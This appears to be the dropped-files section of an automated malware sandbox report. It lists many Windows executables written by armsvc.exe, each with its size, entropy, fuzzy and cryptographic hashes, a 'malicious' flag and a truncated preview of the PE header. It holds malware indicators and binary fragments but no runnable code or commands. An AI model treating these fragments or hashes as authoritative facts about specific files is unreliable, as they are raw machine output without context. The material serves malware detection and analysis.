                                                                                                                                                                                                                            Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....;.$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1763840
                                                                                                                                                                                                                            Entropy (8bit):5.364966878772687
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:Kd8DMeflpnIOvYURGJ0eeQ2yPyzc+E7xonyVGc/dT5N:KCDD9pnIO6JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:F0F45EA558E66F1C19925571DF891FC0
                                                                                                                                                                                                                            SHA1:B6AC7F03CE38764B8B13F045494384DBE420BEB5
                                                                                                                                                                                                                            SHA-256:D7DA24CEE9B658A494A01C2AD11F1A07B1ADB488255BFA82F2229E02D5E4B700
                                                                                                                                                                                                                            SHA-512:F6C81CE410DFC860EAB416E8380CCA37F31D9F421AD2C3D27C951DD6F87EB6C783EEAF1C133CB799A1F98DE1DEB4869940314F15E2EC44DECA984FCED4BEACB8
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................%.....#[.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4364800
                                                                                                                                                                                                                            Entropy (8bit):6.745658050368103
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:qB1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8E9JLeQVPyzc+EB:EHzorVmr2gkRpdJYolX1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:71C24BF29F4357FBA025E115DC3C0A81
                                                                                                                                                                                                                            SHA1:BC65C556AAFB0DD6EC0F411BDF288D503436E4EA
                                                                                                                                                                                                                            SHA-256:B2FE6BEC5EF123553BF2130417FD6C17F56783385CF532D9B1792F8C13A4441E
                                                                                                                                                                                                                            SHA-512:54D312E3B1117E9B8EC72B24049576AAD8B3D74513F469DE35A692D1F48021A4404953F6257CFEDB42D682FCDFDC70D4DBC0DE4C60875B1EC992C1AB8DA650B7
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.....3.B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1345024
                                                                                                                                                                                                                            Entropy (8bit):4.81067273398373
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:NEyTrGJ0eeQ2yPyzc+E7xonyVGc/dT5N:6yOJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:7E51966F9182D8088DC7BBBD52D7E5EC
                                                                                                                                                                                                                            SHA1:F22EB10D4CDAC558B0DB4422A79EDBE264DE511A
                                                                                                                                                                                                                            SHA-256:0651E737746B312DC540C7E605BC3693EC67974A96F8EF89F045785B3E3FACBF
                                                                                                                                                                                                                            SHA-512:7E8DA96572357392F24345D15D82BDD692C0B34A2EB3069850B5F9384C0F858A3DEF1AAF074B64222CA96500D1C88F77D6C95BC2870864C0DE4CBF09ED076C3D
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@....................................{..... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc..............................@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2354176
                                                                                                                                                                                                                            Entropy (8bit):7.044729417160485
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:qhDdVrQ95RW0YQHyWQXE/09Val0G7JLeQVPyzc+E7xQ2l:qhHYWmHyWKQ1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:422656A98AE1E4FC0F42676F7870266C
                                                                                                                                                                                                                            SHA1:E63ECD0AAF7DE83630F427451C67A15467FDD7BA
                                                                                                                                                                                                                            SHA-256:6A3A560D41D6754E2687A92F59167DCC8B95F2C7741966A3779ABDF46C68EA07
                                                                                                                                                                                                                            SHA-512:59714B4E0688D9D2E71DA6912867D7DD1E36D85C39C52F953A27E477A0A7FAF4B286C7772E5238C633A00CEFF35B00F1363D1E0C4763D6D1F8307F5E76743ED8
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1825280
                                                                                                                                                                                                                            Entropy (8bit):7.151808192898985
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:670E0ZCQZMib6Rrt9RoctGfmdd6GJ0eeQ2yPyzc+E7xonyVGc/dT5N:+0EzQS7RPRoc1JJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:7230CD0572C3917E78C9A8FEC2B90510
                                                                                                                                                                                                                            SHA1:DB70A954BA08A5C61212A5A0E9515298CDC0C5FE
                                                                                                                                                                                                                            SHA-256:3A646B7FABF73A17B5B76CC2140DB08A536E277587482B10A209663580259B83
                                                                                                                                                                                                                            SHA-512:9354B005186BEC12F524F0CDF1CEB2F23BC3C26A5B239DF17BE8C2AF6962EA91B206B9E55212664278F158A4BF65C7A2EA48BE6834E24F50345FB30F5222329A
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0.......>.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1847808
                                                                                                                                                                                                                            Entropy (8bit):7.138841868700977
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:/D2VmAygwIb8boQdJLeQVPyzc+E7xQ2l:r2VBwIbq1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:2E25202C5BF6484F1561AF29BEDD523A
                                                                                                                                                                                                                            SHA1:75F090EB688F842FBBD3CFA5E3B199A5E3DA4E75
                                                                                                                                                                                                                            SHA-256:1D29EE60FAFD8F2A10600923EDCC6EC2AB21FF8653B435603EB9DE0643D47A4F
                                                                                                                                                                                                                            SHA-512:8E47A390756F96B43FCA4D4E5D0258A1F40DD59CA654B9C83C87C6D985C6CFC212BF357E94925AFAF130CBDFE20358751BA4549A870146171A0CE4C11F476CA0
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2853376
                                                                                                                                                                                                                            Entropy (8bit):6.946676538956616
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:CfD3zO9ZhBGlohzM3HRNr00FJLeQVPyzc+E7xQ2l:4DaalSzM00F1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:27E464912EB86B08B7ACE72C4F464017
                                                                                                                                                                                                                            SHA1:F2FA9CE044081A26FA068D677E634FA4DDD40FB0
                                                                                                                                                                                                                            SHA-256:1AFF739EE8C95C7BED89CE57092B91F2911B2CF062135EC57BDF7CDB7FBE3C5E
                                                                                                                                                                                                                            SHA-512:DC76FAFCE22FB5C21324E02464C596E7568187C2869F09DD8D89404A13D432E670430D569DBFC9C7522DC2E338D1EEFA82595D4C3B546667446FFFE7EE315A85
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......S,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4320256
                                                                                                                                                                                                                            Entropy (8bit):6.821686656742896
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:TTaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhSJLeQVPyS:SI72Lvkr4pbxJRoIMt1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:57BAD3F568FD1DE2259293E14938E069
                                                                                                                                                                                                                            SHA1:BC78FF10F51CF5A37AEBEF8AC7C7E532305F06DE
                                                                                                                                                                                                                            SHA-256:D01A40B7F7796F79CFB01D0B3F5799433CC9F3B5531F9733E4F5BD6FD9FB046F
                                                                                                                                                                                                                            SHA-512:5DC1E223372FA9226D6A3ECDA4E296358E11E4D94EDB001EE9EC5E1AF957A6F08E1006A1B1422ACCB9FF62ED6EB4EADF5F08C0F3F02C21B9023369BFB1FD7F4E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2062336
                                                                                                                                                                                                                            Entropy (8bit):7.0912194765179
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:jWnm5iAMkjmQWkV9JLeQVPyzc+E7xQ2l:4OMkV1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:BF8F8B75E4224C7C305EB995DDCAF31A
                                                                                                                                                                                                                            SHA1:44C48FD06AFD17858C81CEF51D2123C81DEACBEE
                                                                                                                                                                                                                            SHA-256:3A919AA69F223CB4250543D87B9FAFD5AD89FBD91006E6A695795530727CF50A
                                                                                                                                                                                                                            SHA-512:77CE7739AB0FD3D7D3FBAF481C77DEFC306890C17466C146A233C8B36078D934E6F575B090B2897342D5CEC79DD5F071E1489DE8EE39C5311BE1739BE4BBAF77
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....Z..... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1801216
                                                                                                                                                                                                                            Entropy (8bit):7.159635691986473
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:TwNHwoYhua6MZERO4qbBJTY6mY1uIgIGJ0eeQ2yPyzc+E7xonyVGc/dT5N:TwNPdNO7BJTfmEUJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:B69ABCE7E140C2D5B4456DB97C6669DB
                                                                                                                                                                                                                            SHA1:62F9EDD78DE6415C0F0DDB3790083A12E74E9071
                                                                                                                                                                                                                            SHA-256:54871383B19EA3250E80EAA19E47B0EAE0BB15BFE310A58551C1F5D4FABFB982
                                                                                                                                                                                                                            SHA-512:EDA1EB7F654CAB53197F176A44C57B643B582E0BB78C599A945C3C14CD70650DC8AF62436F08626B4C95DD30CA91AE547EA74A0352FED4D5C0756AF9FFF3A9ED
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1847808
                                                                                                                                                                                                                            Entropy (8bit):7.13884241607224
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:1D2VmAygwIb8boQdJLeQVPyzc+E7xQ2l:V2VBwIbq1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:9A22553BEA1548F6F47F34BEB9C7053D
                                                                                                                                                                                                                            SHA1:11C3D9EF995AADC66BC7D2B4B020910B1FF17596
                                                                                                                                                                                                                            SHA-256:D684D04AC1D52CBE89E68BC13636FBE715268F1E1A65152E49ED07681F578824
                                                                                                                                                                                                                            SHA-512:F6D2ADD8545706E7FED202F99E9CAE254C7BA370A7D400932D635F4B3A654140CC2A3F6D2EF7B95DED6766BA7F705A36511188E37F76B02FBA2271125FC0D27E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1801216
                                                                                                                                                                                                                            Entropy (8bit):7.159637625935675
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:ywNHwoYhua6MZERO4qbBJTY6mY1uIgIGJ0eeQ2yPyzc+E7xonyVGc/dT5N:ywNPdNO7BJTfmEUJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:94A0763BC754301ED2F3BD160E945184
                                                                                                                                                                                                                            SHA1:42B377C29011471BA62232F912982E06DCE2EA14
                                                                                                                                                                                                                            SHA-256:72DFB2739C56BD13BC9EDAB87CBEECBA698689912C02C1CACF12BC2D03D502B5
                                                                                                                                                                                                                            SHA-512:76B1637D1E7E6FA2658C30DFD81CAC2547FA2F6F06167A95F4B3EB6C893CC2029C12A1F71CF842C3F9423440CE5A7443DD3C9E3388D7B7182AC86FB1C5B7502E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1432064
                                                                                                                                                                                                                            Entropy (8bit):4.8248730273687865
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:m6lbht6BHtGJ0eeQ2yPyzc+E7xonyVGc/dT5N:plNtqHYJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:D856BA341030FBEDFA0D1935CA71D65D
                                                                                                                                                                                                                            SHA1:6C325C78851473B4FD6BB57388E20D35C060102A
                                                                                                                                                                                                                            SHA-256:BCCE499B59B4BBEF9154D8F601B14D1746F50280990DA421FF9F20FB4855F23B
                                                                                                                                                                                                                            SHA-512:8B3CCC4EC48350147BC95743E0C5209428892B19F18A7118B1EB629A2D04888BFD4385BADA1AAD682E7F21F493CB19A1E7C0D87637944EDA2143548053E1C7FD
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.......................... .............................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc.......0......................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1327616
                                                                                                                                                                                                                            Entropy (8bit):4.7970697028670894
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:zIxkTBVZGJ0eeQ2yPyzc+E7xonyVGc/dT5N:Mxk1VUJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:235B915E370B137A9DEC656B59B5A701
                                                                                                                                                                                                                            SHA1:0161EFA6842EBE6AEBC9D93C6C8EA121AA3FC8A8
                                                                                                                                                                                                                            SHA-256:211F497A1B8F292092593227C47D76D41B1A1FFF639CB1B45E0F350CC3CBD09A
                                                                                                                                                                                                                            SHA-512:AE9A9DE9ADD1EA5619A198951E4F941F229B1F9784EC347AF8BC9D4022C6184D397EFF24FFE7DC6735BFC5A0721E0FEFE84D40A4DD375CE445A705A06E484F86
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.........................................................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...............R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1441792
                                                                                                                                                                                                                            Entropy (8bit):4.919924310443888
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:icssmrOGJ0eeQ2yPyzc+E7xonyVGc/dT5N:7bmJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:38CFEB2B7C58EF5AC55D957E79071D60
                                                                                                                                                                                                                            SHA1:B475771146D2B7A380E341BA208EC43CB3B8A2A2
                                                                                                                                                                                                                            SHA-256:3D46E78BB2A9537280C711F3495011A171E6C0553E54094C061DAF64689D27EB
                                                                                                                                                                                                                            SHA-512:D030DF039FF4875A1D790C7605F96443D200B13ED6AD6FB9BA711967563E2F1260FCB770B08D0BA1487EF72107082AE4BA042F67B92C7C32063E68DA5BA1A8AE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.............................p ........... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc............... ..............@...........................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1490432
                                                                                                                                                                                                                            Entropy (8bit):5.02613966811235
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:0TfcT++foSBWU2YxhkgjGJ0eeQ2yPyzc+E7xonyVGc/dT5N:cfcK+foQWU2YnPyJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:7AC4F5091679F4EA6709D7F6C37055D3
                                                                                                                                                                                                                            SHA1:77B69049E498B1639CAF7610F48E26A723B954F8
                                                                                                                                                                                                                            SHA-256:995AAF9BE0C5D787DBF85127DA59DD04B9F033D6DC58D81E9F22CCA35AC22BC0
                                                                                                                                                                                                                            SHA-512:11E7CAFE5D23A5B19071CE553AE35EF34137E0521412BEAC290C8020DDA9E06127ADA797A375690413A5B3F5682C4CF0A1C4DBED15578D03F2E6DBEA1DC47F63
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@...........................!..............................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1327616
                                                                                                                                                                                                                            Entropy (8bit):4.797111427072514
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:/bBRzBgDGJ0eeQ2yPyzc+E7xonyVGc/dT5N:zBRVgSJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:D05B11FF287279959B7D2DDDACF4CF02
                                                                                                                                                                                                                            SHA1:F00F45089DACF2EA81B6ECF4BDAB4919FE4285FA
                                                                                                                                                                                                                            SHA-256:02212DC25FD8625470EE21BD3E3F6A69F690345D10CC803DBF3B7ECFD42D7A64
                                                                                                                                                                                                                            SHA-512:2539D35F801542209ADE42AFEA057BB17FF12491E01CAD1577EFB411C68DF035E9CA408198379294755F99DEEBEC8CA04A123A68D6636842CCA1AC05C45333EE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
